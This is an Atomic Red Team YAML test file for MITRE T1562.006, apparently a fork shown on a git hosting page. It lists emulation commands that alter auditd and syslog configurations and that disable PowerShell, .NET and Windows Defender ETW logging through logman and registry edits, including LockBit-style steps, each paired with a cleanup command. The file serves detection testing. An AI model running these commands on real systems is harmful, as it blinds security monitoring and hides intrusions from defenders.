adam/atomic-red-team-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
62a85c12b51a6d903a8357cb91b555ff1b203fd3
atomic-red-team-gs/atomics/T1562.006/T1562.006.yaml
T
Hare Sudhan 62a85c12b5 FreeBSD changes (#2585) 
* freebsd changes

* renaming freebsd to linux
2023-11-06 17:41:43 -05:00

204 lines
8.8 KiB
YAML
Raw Blame History

attack_technique: T1562.006
display_name: 'Impair Defenses: Indicator Blocking'
atomic_tests:
- name: 'Auditing Configuration Changes on Linux Host'
auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3
description: |
Emulates modification of auditd configuration files
supported_platforms:
- linux
input_arguments:
audisp_config_file_name:
description: The name of the audispd configuration file to be changed
type: string
default: audispd.conf
auditd_config_file_name:
description: The name of the auditd configuration file to be changed
type: string
default: auditd.conf
libaudit_config_file_name:
description: The name of the libaudit configuration file to be changed
type: string
default: libaudit.conf
executor:
command: |
sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}
else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}
cleanup_command: |
sed -i '$ d' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ d' /etc/#{auditd_config_file_name}
else sed -i '$ d' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ d' /etc/#{libaudit_config_file_name}
name: bash
elevation_required: true
- name: 'Auditing Configuration Changes on FreeBSD Host'
auto_generated_guid: cedaf7e7-28ee-42ab-ba13-456abd35d1bd
description: |
Emulates modification of auditd configuration files
supported_platforms:
- linux
input_arguments:
auditd_config_file_name:
description: The name of the auditd configuration file to be changed
type: string
default: audit_event
executor:
command: |
echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name}
cleanup_command: |
sed -i "" '/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name}
name: sh
elevation_required: true
- name: 'Logging Configuration Changes on Linux Host'
auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c
description: |
Emulates modification of syslog configuration.
supported_platforms:
- linux
input_arguments:
syslog_config_file_name:
description: The name of the syslog configuration file to be changed
type: string
default: syslog.conf
rsyslog_config_file_name:
description: The name of the rsyslog configuration file to be changed
type: string
default: rsyslog.conf
syslog_ng_config_file_name:
description: The name of the syslog-ng configuration file to be changed
type: string
default: syslog-ng.conf
executor:
command: |
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
cleanup_command: |
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ d' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ d' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
name: bash
elevation_required: true
- name: 'Logging Configuration Changes on FreeBSD Host'
auto_generated_guid: 6b8ca3ab-5980-4321-80c3-bcd77c8daed8
description: |
Emulates modification of syslog configuration.
supported_platforms:
- linux
input_arguments:
syslog_config_file_name:
description: The name of the syslog configuration file to be changed
type: string
default: syslog.conf
executor:
command: |
if [ -f "/etc/#{syslog_config_file_name}" ];
then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}
fi
cleanup_command: |
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}
fi
name: sh
elevation_required: true
- name: Disable Powershell ETW Provider - Windows
auto_generated_guid: 6f118276-121d-4c09-bb58-a8fb4a72ee84
description: This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.
supported_platforms:
- windows
input_arguments:
ps_exec_location:
description: Location of PSExec.
type: string
default: PathToAtomicsFolder\..\ExternalPayloads\pstools\PsExec.exe
session:
description: The session to disable.
type: string
default: EventLog-Application
provider:
description: The provider to disable.
type: string
default: Microsoft-Windows-Powershell
dependency_executor_name: powershell
dependencies:
- description: PSExec must be installed on the machine.
prereq_command: if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1}
get_prereq_command: |-
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip"
expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force
executor:
command: cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets
cleanup_command: cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets
name: powershell
elevation_required: true
- name: Disable .NET Event Tracing for Windows Via Registry (cmd)
auto_generated_guid: 8a4c33be-a0d3-434a-bee6-315405edbd5b
description: Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry
supported_platforms:
- windows
executor:
command: REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0
cleanup_command: REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1
name: command_prompt
elevation_required: true
- name: Disable .NET Event Tracing for Windows Via Registry (powershell)
auto_generated_guid: 19c07a45-452d-4620-90ed-4c34fffbe758
description: Disables ETW for the .NET Framework using PowerShell to update the Windows registry
supported_platforms:
- windows
executor:
command: New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force
cleanup_command: REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1
name: powershell
elevation_required: true
- name: LockBit Black - Disable the ETW Provider of Windows Defender -cmd
auto_generated_guid: f6df0b8e-2c83-44c7-ba5e-0fa4386bec41
description: |
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
supported_platforms:
- windows
executor:
command: |
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f
cleanup_command: |
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
auto_generated_guid: 69fc085b-5444-4879-8002-b24c8e1a3e02
description: |
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
supported_platforms:
- windows
executor:
command: |
New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -PropertyType DWord -Value 0 -Force
cleanup_command: |
Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore
name: powershell
elevation_required: true
Reference in New Issue View Git Blame Copy Permalink